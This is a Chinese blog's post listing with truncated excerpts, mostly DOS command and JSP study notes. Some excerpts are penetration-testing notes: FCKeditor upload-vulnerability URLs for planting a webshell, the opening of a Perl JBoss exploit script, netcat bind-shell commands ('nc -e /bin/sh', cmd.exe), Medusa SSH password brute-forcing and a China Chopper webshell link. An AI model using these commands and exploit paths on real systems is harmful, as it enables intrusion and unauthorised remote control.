- 博客(228)
- 资源 (11)
- 收藏
- 关注
原创 DOS命令之fc
D:\test>fc /?比较两个文件或两个文件集并显示它们之间的不同FC [/A] [/C] [/L] [/LBn] [/N] [/OFF[LINE]] [/T] [/U] [/W] [/nnnn] [drive1:][path1]filename1 [drive2:][path2]filename2FC /B [drive1:][path1]filename1 [drive2
2013-06-06 15:02:22 1052
原创 DOS命令之ren
D:\test>ren /?重命名文件。RENAME [drive:][path]filename1 filename2.REN [drive:][path]filename1 filename2.请注意,您不能为目标文件指定新的驱动器或路径。D:\test>(1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名; (2)允许使用通配符更改一组文件名
2013-06-06 11:33:46 2151
原创 DOS命令之type
D:\test>type /?显示文本文件的内容。TYPE [drive:][path]filenameD:\test>(1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2; (2)该命令一次只可以显示一个文件的内容,不能使用通配符; (3)如果文件有扩展名,则必须将扩展名写上; (4)当文件较长,一屏显
2013-06-06 11:32:13 2194
原创 DOS命令之xcopy
D:\test>xcopy /?复制文件和目录树。XCOPY source [destination] [/A | /M] [/D[:date]] [/EXCLUDE:file1[+file2][+file3]...] source 指定要复制的文件。 destination 指定新文件的位置和/或名称。 /A
2013-06-06 11:29:14 1120
原创 DOS命令之copy
D:\test>copy /?将一份或多份文件复制到另一个位置。COPY [/D] [/V] [/N] [/Y | /-Y] [/Z] [/L] [/A | /B ] source [/A | /B] [+ source [/A | /B] [+ ...]] [destination [/A | /B]] source 指定要复制的文件。 /A
2013-06-06 11:09:56 1121
原创 DOS命令之label、vol
D:\test>label /?创建、更改或删除磁盘的卷标。LABEL [drive:][label]LABEL [/MP] [volume] [label] drive: 指定驱动器号。 label 指定卷标。 /MP 指定卷应被视为装入点或卷名。 volume 指定驱动器号(后面跟一个冒号
2013-06-06 09:45:15 1694
原创 DOS命令之chkdsk
D:\test>chkdsk /?检查磁盘并显示状态报告。CHKDSK [volume[[path]filename]]] [/F] [/V] [/R] [/X] [/I] [/C] [/L[:size]] [/B] volume 指定驱动器号(后面跟一个冒号)、装入点或卷名。 filename 仅用于 FAT/FAT32: 指定要检查是否有碎片
2013-06-06 09:08:55 1961
原创 DOS命令之format
D:\test>format /?格式化磁盘以供 Windows 使用。FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X] [/P:passes][/S:state]FORMAT volume [/V:label] [/Q] [/F:size] [/P:passes]FORMAT volume [/V:
2013-06-05 15:29:55 1324
原创 DOS命令之tree
D:\test>tree /?以图形显示驱动器或路径的文件夹结构。TREE [drive:][path] [/F] [/A] /F 显示每个文件夹中文件的名称。 /A 使用 ASCII 字符,而不使用扩展字符。D:\test>tree卷 DataCenter 的文件夹 PATH 列表卷序列号为 00000200 CCC4:4136D:.├─a└─bD
2013-06-05 15:26:38 922
原创 DOS命令之path
D:\test>path /?为可执行文件显示或设置一个搜索路径。PATH [[drive:]path[;...][;%PATH%]PATH ;键入 PATH ; 清除所有搜索路径设置并指示 cmd.exe 只在当前目录中搜索。键入 PATH 但不加参数,显示当前路径。将 %PATH% 包括在新的路径设置中会将旧路径附加到新设置。D:\test>
2013-06-05 15:25:01 1942
原创 DOS命令之dir
C:\>dir /?显示目录中的文件和子目录列表。DIR [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/N] [/O[[:]sortorder]] [/P] [/Q] [/R] [/S] [/T[[:]timefield]] [/W] [/X] [/4] [drive:][path][filen
2013-06-05 15:13:02 947 1
原创 DOS命令之rd
功能:删除一个目录D:\>rd /?删除一个目录。RMDIR [/S] [/Q] [drive:]pathRD [/S] [/Q] [drive:]path /S 除目录本身外,还将删除指定目录下的所有子目录和 文件。用于删除目录树。 /Q 安静模式,带 /S 删除目录树时不要求确认D:\>D:\>cd /d c:
2013-06-05 15:00:14 1362
原创 DOS命令之cd
功能:显示或改变当前目录C:\>cd /?显示当前目录名或改变当前目录。CHDIR [/D] [drive:][path]CHDIR [..]CD [/D] [drive:][path]CD [..] .. 指定要改成父目录。键入 CD drive: 显示指定驱动器中的当前目录。不带参数只键入 CD,则显示当前驱动器和目录。使用 /D 开关,除了改变驱动器的当前
2013-06-05 14:54:23 984
原创 DOS命令之md
功能:创建目录C:\>md /?创建目录。MKDIR [drive:]pathMD [drive:]path如果命令扩展被启用,MKDIR 会如下改变:如果需要,MKDIR 会在路径中创建中级目录。例如: 假设 \a 不存在,那么: mkdir \a\b\c\d与: mkdir \a chdir \a mkdir b chdir
2013-06-05 14:45:42 1369
原创 DDoS
http://www.ibm.com/developerworks/cn/security/se-ddos/http://qkiller.blog.51cto.com/502686/110478http://www.ixpub.net/blog-14972820-375064.html
2013-05-22 18:06:33 745
原创 《JSP开发技术》读书笔记之JavaBean技术
JavaBean规范将“软件组件”的概念引入了Java编程领域,JavaBean是描述Java的软件组件模型,主要目的是为了实现代码的复用。JavaBean本身是一个Java类,与普通的Java类相比稍有不同,它要遵守一些规定:1、实现接口java.io.Serializable;Java的“对象序列化”2、JavaBean类提供一个无参数的构造函数3、JavaBean内的属性都应该
2013-04-12 11:33:24 929
原创 《JSP开发技术》读书笔记之内置对象
jsp中隐含定义了9个对象,也叫内置对象。page:代表当前对象;pageContext:页面上下文对象,记录当前页面的相关信息;request:该对象封装了用户提交的信息;response:对客户的请求做出动态的响应,向客户端发送数据;session:会话对象,记录会话范围内的相关信息;application:应用对象,记录应用范围内的相关信息;out:输出流对象,用
2013-04-11 16:35:24 939
原创 《JSP开发技术》读书笔记之基本语法
jsp文件的组成部分主要是两类:一类是jsp元素,另一类是html模板。html模板主要是用于静态网页显示;在html模板的基础上增加和动态网页实现有关的jsp元素,来实现网页的动态交互。简单的说,jsp文件就是嵌入java代码的html文件。jsp元素包括以下4种:指令元素:用来提供整个jsp网页信息,如页面使用的字符集、脚本使用的语言等;脚本元素:嵌入java代码,用来实现
2013-04-08 15:02:19 1080
原创 《JSP开发技术》读书笔记之JSP运行机制
jsp的执行必须同时具备3个条件:jsp容器、java编译器和java虚拟机。在jsp运行过程中,首先由客户端浏览器发出请求,jsp容器接收请求后,jsp容器对jsp代码进行以下4个操作过程(如果不是首次访问并且jsp文档没有更改过则直接执行第4步)1、代码转化。jsp容器将jsp文件转换成java servlet文件;2、编译。jsp容易编译java servlet文件,生成class
2013-04-03 10:11:06 1086
转载 fckeditor asp 漏洞利用
出现上传漏洞的地址是: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是: http://www.xxx.co
2013-03-31 01:19:01 1685
转载 fckeditor jsp 漏洞利用
Fckeditor jsp版漏洞利用方法:http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
2013-03-31 01:05:23 1667
转载 jboss HEAD exp
发一下最近整理的一个小东西吧。JBOSS蠕虫。。。首先发一个exp#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/
2013-03-30 18:50:44 1424
原创 《渗透测试实践指南》读书笔记之后门和rootkit
瑞士军刀:NetCat监听方:nc -l -p 1234连接方:nc ip 1234传文件:nc -l -p 7777 > calc.exenc ip 7777 < calc.exe打开shell:-e参数nc -l -p 8888 -e /bin/shnc.exe -L -p 8888 -e c:\windows\system32\cmd.exeNetCat的加密版本:
2013-03-30 14:58:01 1220
原创 《渗透测试实践指南》读书笔记之漏洞利用
远程密码破解:Medusa,Hydramedusa -h target_ip -U user_list -P pass_dict -M service_to_attack如:medusa -h 192.168.1.10 -u ownedb -P /pentest/passwords/wordlists/darkc0de.lst -M sshMeterpreter shellmigra
2013-03-29 16:52:41 1186
原创 《渗透测试实践指南》读书笔记之扫描
批量ping工具:fpingbt中已集成fping -a -g 192.168.1.1 192.168.1.254>hosts.txt;man fping端口扫描:nmapTCP连接扫描:nmap -sT -p- -PN 192.168.1.10,nmap -sT -p- -PN 192.168.1.10-254SYN扫描:nmap -sS -p- -PN 192.16
2013-03-29 09:51:50 1202
原创 《渗透测试实践指南》读书笔记之信息搜集
主动侦察:与目标交互,可能会被记录。被动侦察:无交互。HTTrack:网站复制下载地址:www.httrack.com安装:windows傻瓜式;bt下运行“apt-get install webhttrack”仔细浏览目标网站,关注细节。物理地址和位置、电话号码、电子邮箱地址、运营时间、商业关系、员工姓名、与社会媒体的联系,花絮新闻等。关注新闻和公告,可能会发现有用的信息
2013-03-28 18:58:07 1672
原创 网站防盗链的方法
8种防盗链方法:http://www.code-123.com/html/2008814181422580.htmlapache防盗链(Anti-Leech)技术的简单实现:http://www.xiaohui.com/dev/server/20070330-apache-anti-leech.htmapache & nginx 防盗链设置:http://www.cnp
2013-03-11 11:42:04 884
原创 apache .htaccess介绍
.htaccess入门教程:http://www.cnphp.info/htaccess-beginer.html.htaccess rewrite规则详细说明:http://www.cnphp.info/?p=216
2013-03-11 10:21:14 954
原创 windows xp sp2 系统,apache php环境安装过程
1、安装apache 当前windows下的最新版是httpd-2.2.22-win32-x86-no_ssl.msi,可到http://httpd.apache.org/download.cgi下载。 安装过程截图参考:http://server.chinabyte.com/13/2475513.shtml 配置文件为:C:\Program Files\Apa
2013-03-06 15:53:01 966
原创 wxPython写的简单md5破解程序
# -*- coding: cp936 -*-import wximport osimport hashlibclass TextFrame(wx.Frame): def __init__(self): wx.Frame.__init__(self, None, -1, 'md5Cracker By blrk', size=(500, 300));
2013-03-01 15:15:33 673
原创 Chrome Extension 开发文档 (360极速浏览器应用开放平台)
http://open.chrome.360.cn/extension_dev/overview.html
2013-02-07 14:47:38 1322
原创 Chrome Extension for Securityoverride
manifest.json:{"name": "my first Chrome extension","manifest_version": 2,"version": "1.0","description": "my first Chrome extension, not bad","content_scripts": [{"matches": ["*"],"j
2013-02-07 11:27:33 613
原创 菜刀 下载链接
http://www.st999.cn/blog/?action=show&id=144http://www.hacknote.com/read/736.html
2013-02-04 16:43:20 1894
原创 web培训
sqlmap, pangolinhttp抓包:Fidderettercap:中间人攻击uptime.netcraft.com:由域名查询ip范围www.exploitdownloads.com
2012-12-14 09:52:00 1067
转载 漏洞挖掘
挖掘有几个技术条件:第一,对调试很了解。对软件结构很了解。对所想挖掘的功能要比较了解。第二,要有一点想法或者有一点经验,知道软件在什么情况下可能会出现问题。第三,然后下一步要写一个程序去把这样的问题找出来,而不是自己去找。如果自己去找的话,这样的精力或者时间花费太多,我以前是自己去找,但是效果不是很好。还是要先学会手工找,理解了原理,再用自动化工具,或自己写工具。
2012-11-02 15:58:30 821
转载 职场9个先后顺序
①职场:先升值,再升职; ②沟通:先求同,再求异; ③执行:先完成,再完美; ④学习:先记录,再记忆; ⑤投诉:先解决心情,再解决事情; ⑥人际:先交流,再交心; ⑦先成长,再成功; ⑧先站住,再站高; ⑨先仿造,再创造。
2012-11-01 17:35:08 826
MySQL-python-1.2.5.win-amd64-py2.7.exe
2017-11-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人